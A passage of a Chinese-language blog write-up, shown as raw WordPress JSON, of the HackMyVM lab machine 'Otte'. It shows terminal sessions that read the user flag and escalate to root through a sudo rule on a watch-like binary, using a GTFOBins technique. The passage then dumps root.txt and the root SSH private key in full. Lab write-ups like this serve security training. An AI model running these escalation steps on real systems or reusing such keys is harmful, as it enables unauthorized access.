IRnuyGrxsTEkmrTAAAACXJvb3RAb3R0ZQE=\n-----END OPENSSH PRIVATE KEY-----\ncedric@otte:~$ cat user.txt \ne1e4e2e00a00df7b40c5436155ab4996\ncedric@otte:~$ cd .ssh;ls -la\ntotal 12\ndrwx------ 2 cedric cedric 4096 May 16  2021 .\ndrwx------ 5 cedric cedric 4096 May 17  2021 ..\n-rw-r--r-- 1 cedric cedric  222 May 16  2021 known_hosts\ncedric@otte:~\/.ssh$ cd ..\ncedric@otte:~$ ssh-keygen -y -f id_rsa \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzc3fvk0OLTl7Mx2VF6cr9A6AfAIV05BjNmrBnJ+lxNtP4fYzYjnvxNDtv3lbeLHsyuZD6C29nPCpvi7hUdX5tjjt5e8aFcH5Wtu1zOouXjs8RV6tCUBp433igqXwbVl1WKeQ7vYO+yuqBBacJNkXPU0e0ROwXBFWDklOYwSvnRW6Yi3VK7MQueQgP+3+ajLnwpmpOxndi3hCNwOppUlDNhEm6f8rJ4zatAXPP5SMIp6\/P3c98Qjn0zHdkI7t3kL6HU5uGwQsQi3WJGz18YavwyjXHSlQLlwhTDGgOSQ6zpx4WJ7iY7mK\/dL1c7CNoF115rpgqHyFJQCdlvsgIJ9jN\ncedric@otte:~$ sudo -l\nMatching Defaults entries for cedric on otte:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser cedric may run the following commands on otte:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/mmwatch<\/code><\/pre>\n<p>\u8fd9\u4e2a<code>\/usr\/bin\/mmwatch<\/code>\u7591\u4f3c<code>watch<\/code>\uff0c<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/watch\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/watch\/#sudo<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240520.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240520.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618021810746\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6267\u884c\u5b8c\u547d\u4ee4\uff0c\u7136\u540e<code>exit<\/code>\u5373\u53ef\u770b\u5230\u7ed3\u679c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240521.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240521.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618021918375\" \/><\/div><\/p>\n<p>\u4e5f\u53ef\u4ee5\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n<p>\u7814\u7a76\u4e00\u4e0b watch \u547d\u4ee4\u4e5f\u53ef\u4ee5\u53d1\u73b0\u5176\u4ed6\u7684\u5229\u7528\u65b9\u6cd5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte]\n\u2514\u2500$ watch ls -la<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240522.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240522.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618022050600\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7531\u6b64\u53ef\u77e5\uff1a<\/p>\n<pre><code class=\"language-bash\">cedric@otte:~$ sudo -u root \/usr\/bin\/mmwatch ls -la \/root\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240523.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240523.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618022423419\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6240\u4ee5\u53ea\u6267\u884c\u4e86\u7b2c\u4e00\u6bb5\u547d\u4ee4\u5373<code>ls<\/code>\uff0c\u5c1d\u8bd5\u63d0\u6743root\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240524.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240524.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618023039052\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u540c\u6837\uff0c\u6267\u884c\u5b8c\u547d\u4ee4\u540e exit \u5373\u53ef\u770b\u5230\u6267\u884c\u7ed3\u679c\uff0c\u6216\u5c1d\u8bd5\u53cd\u5f39 shell\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240525.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506180240525.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618023436526\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) root@otte:\/root# ls -la\ntotal 36\ndrwx------  4 root root 4096 May 16  2021 .\ndrwxr-xr-x 18 root root 4096 May 15  2021 ..\nlrwxrwxrwx  1 root root    9 May 16  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 May 15  2021 .local\n-rw-------  1 root root 1500 May 15  2021 .mysql_history\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rwx------  1 root root   33 May 16  2021 root.txt\ndrwx------  2 root root 4096 May 16  2021 .ssh\n-rw-r--r--  1 root root  173 May 15  2021 .wget-hsts\n(remote) root@otte:\/root# cat root.txt \n84decf19261819687b63c8210cd28f7c\n(remote) root@otte:\/root# cd .ssh\n(remote) root@otte:\/root\/.ssh# ls -la\ntotal 20\ndrwx------ 2 root root 4096 May 16  2021 .\ndrwx------ 4 root root 4096 May 16  2021 ..\n-rw-r--r-- 1 root root  391 May 16  2021 authorized_keys\n-rw------- 1 root root 1811 May 16  2021 id_rsa\n-rw-r--r-- 1 root root  391 May 16  2021 id_rsa.pub\n(remote) root@otte:\/root\/.ssh# cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAs3N375NDi05ezMdlRenK\/QOgHwCFdOQYzZqwZyfpcTbT+H2M2I57\n8TQ7b95W3ix7MrmQ+gtvZzwqb4u4VHV+bY47eXvGhXB+VrbtczqLl47PEVerQlAaeN94oK\nl8G1ZdVinkO72DvsrqgQWnCTZFz1NHtETsFwRVg5JTmMEr50VumIt1SuzELnkID\/t\/moy5\n8KZqTsZ3Yt4QjcDqaVJQzYRJun\/KyeM2rQFzz+UjCKevz93PfEI59Mx3ZCO7d5C+h1Obhs\nELEIt1iRs9fGGr8Mo1x0pUC5cIUwxoDkkOs6ceFie4mO5iv3S9XOwjaBddea6YKh8hSUAn\nZb7ICCfYzQAAA8CcrddwnK3XcAAAAAdzc2gtcnNhAAABAQCzc3fvk0OLTl7Mx2VF6cr9A6\nAfAIV05BjNmrBnJ+lxNtP4fYzYjnvxNDtv3lbeLHsyuZD6C29nPCpvi7hUdX5tjjt5e8aF\ncH5Wtu1zOouXjs8RV6tCUBp433igqXwbVl1WKeQ7vYO+yuqBBacJNkXPU0e0ROwXBFWDkl\nOYwSvnRW6Yi3VK7MQueQgP+3+ajLnwpmpOxndi3hCNwOppUlDNhEm6f8rJ4zatAXPP5SMI\np6\/P3c98Qjn0zHdkI7t3kL6HU5uGwQsQi3WJGz18YavwyjXHSlQLlwhTDGgOSQ6zpx4WJ7\niY7mK\/dL1c7CNoF115rpgqHyFJQCdlvsgIJ9jNAAAAAwEAAQAAAQBnJNZqEMYA+yHIKE\/Q\neInhFcViLGWJA1YyT1hXYnxuQ2pg6KEdFACvaitDqJNbjkudo0VuQ0ZcGxv1E2T2vrXVeK\nw8rmUz663iX7Bpy9vSWBYyzKY2Ll6Y3TGzftdDy0dIsDlsEQj5kB5r3Hje9Z\/4g9CyD+93\nZ1lTj7aXFWkLu0kA3effLft3QawYLEOBn6SMLxNe1ap9IqZVwXLzBbtlXQglr4RnMQUIdl\n\/RK5vZdjGstck2zeC61sZqPpkoIJ0vb\/02CEKNU5wcZUbwmL7iCJlkzQnKHosmTVKv6m6D\nnZE6YicYYwXU\/lWaIm9bZSgh+XSu3MNd9Q4OjysM+uwNAAAAgQCT6o1Zbmud8n5Ly98Ixt\nj8dMGfOQWIUQ9ufjXbwoVAwggBoO93Ozmj2Ro4yWcUl+5rPIJymzPQt6wCwN1y9P0qrrQr\nYFxplOjuGzPbNodZm9WcterJDcCw51mMPkbqERBAgKggjnnFRRTZZgYKbQZITee+LQmWDw\nn6owBoop8e+AAAAIEA4yBD324kr4sYaSdywvM0cnGPAOWTM5GBRNiDaxtQWk9BV9lv9+14\n1H2p2P979TgHSqbG8yROg3AHVoiH1aKWrwZI9UQduWW3bOrMDFHymlb\/rPcSV37ZjVi9RD\nSaofRX4oIdI+6G0KiACToB0Vs4bAzvQepIb84BXNO8483bKd8AAACBAMpDo1xjQzhwJ5z4\n9uqfdCDXfXbQNuDSProTh6oaXCS53B\/ElrQ9clAf5FzGskioqKNIo+LGgKcDEixexb68dw\n0azr6obsElQf9VwI+xVl5iRx+RMjL27swjGkDarDoMbHFzaTSdEee0wIGLId\/yKLCqGRnw\nbIRnuyGrxsTEkmrTAAAACXJvb3RAb3R0ZQE=\n-----END OPENSSH PRIVATE KEY-----\n(remote) root@otte:\/root\/.ssh# diff id_rsa \/home\/cedric\/id_rsa<\/code><\/pre>\n<p>\u9020\u5316\u5f04\u4eba\uff0c\u5176\u5b9e\u4e00\u5f00\u59cb\u5c31\u7ed9\u8fc7\u54b1\u4eec\u79c1\u94a5\u4e86\u3002\u3002\u3002\u3002<\/p>\n<h2>\u79c1\u94a5\u89e3\u51fa\u516c\u94a5\u540d\u5b57<\/h2>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ vim root\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ssh-keygen -y -f root  \n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nPermissions 0664 for &#039;root&#039; are too open.\nIt is required that your private key files are NOT accessible by others.\nThis private key will be ignored.\nLoad key &quot;root&quot;: bad permissions\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ chmod 600 root  \n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ssh-keygen -y -f root\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzc3fvk0OLTl7Mx2VF6cr9A6AfAIV05BjNmrBnJ+lxNtP4fYzYjnvxNDtv3lbeLHsyuZD6C29nPCpvi7hUdX5tjjt5e8aFcH5Wtu1zOouXjs8RV6tCUBp433igqXwbVl1WKeQ7vYO+yuqBBacJNkXPU0e0ROwXBFWDklOYwSvnRW6Yi3VK7MQueQgP+3+ajLnwpmpOxndi3hCNwOppUlDNhEm6f8rJ4zatAXPP5SMIp6\/P3c98Qjn0zHdkI7t3kL6HU5uGwQsQi3WJGz18YavwyjXHSlQLlwhTDGgOSQ6zpx4WJ7iY7mK\/dL1c7CNoF115rpgqHyFJQCdlvsgIJ9jN root@otte<\/code><\/pre>\n<p>\u8fd9\u91cc\u53c8\u80fd\u89e3\u51fa\u6765\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">cedric@otte:~$ ssh-keygen -y -f id_rsa\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzc3fvk0OLTl7Mx2VF6cr9A6AfAIV05BjNmrBnJ+lxNtP4fYzYjnvxNDtv3lbeLHsyuZD6C29nPCpvi7hUdX5tjjt5e8aFcH5Wtu1zOouXjs8RV6tCUBp433igqXwbVl1WKeQ7vYO+yuqBBacJNkXPU0e0ROwXBFWDklOYwSvnRW6Yi3VK7MQueQgP+3+ajLnwpmpOxndi3hCNwOppUlDNhEm6f8rJ4zatAXPP5SMIp6\/P3c98Qjn0zHdkI7t3kL6HU5uGwQsQi3WJGz18YavwyjXHSlQLlwhTDGgOSQ6zpx4WJ7iY7mK\/dL1c7CNoF115rpgqHyFJQCdlvsgIJ9jN<\/code><\/pre>\n<p>\u8fd9\u662f\u4e2a\u8ba9\u4eba\u6df1\u601d\u7684\u60c5\u51b5\u3002\u3002\u3002<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=j_d1P0P57JY\">https:\/\/www.youtube.com\/watch?v=j_d1P0P57JY<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV122421M7Jp\/\">https:\/\/www.bilibili.com\/video\/BV122421M7Jp\/<\/a><\/p>\n<p><a href=\"https:\/\/alientec1908.github.io\/Otte_HackMyVM_Hard\/\">https:\/\/alientec1908.github.io\/Otte_HackMyVM_Hard\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Otte \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Otte] \u2514\u2500$ rustsca [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-888","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/888","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=888"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/888\/revisions"}],"predecessor-version":[{"id":889,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/888\/revisions\/889"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=888"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=888"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=888"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}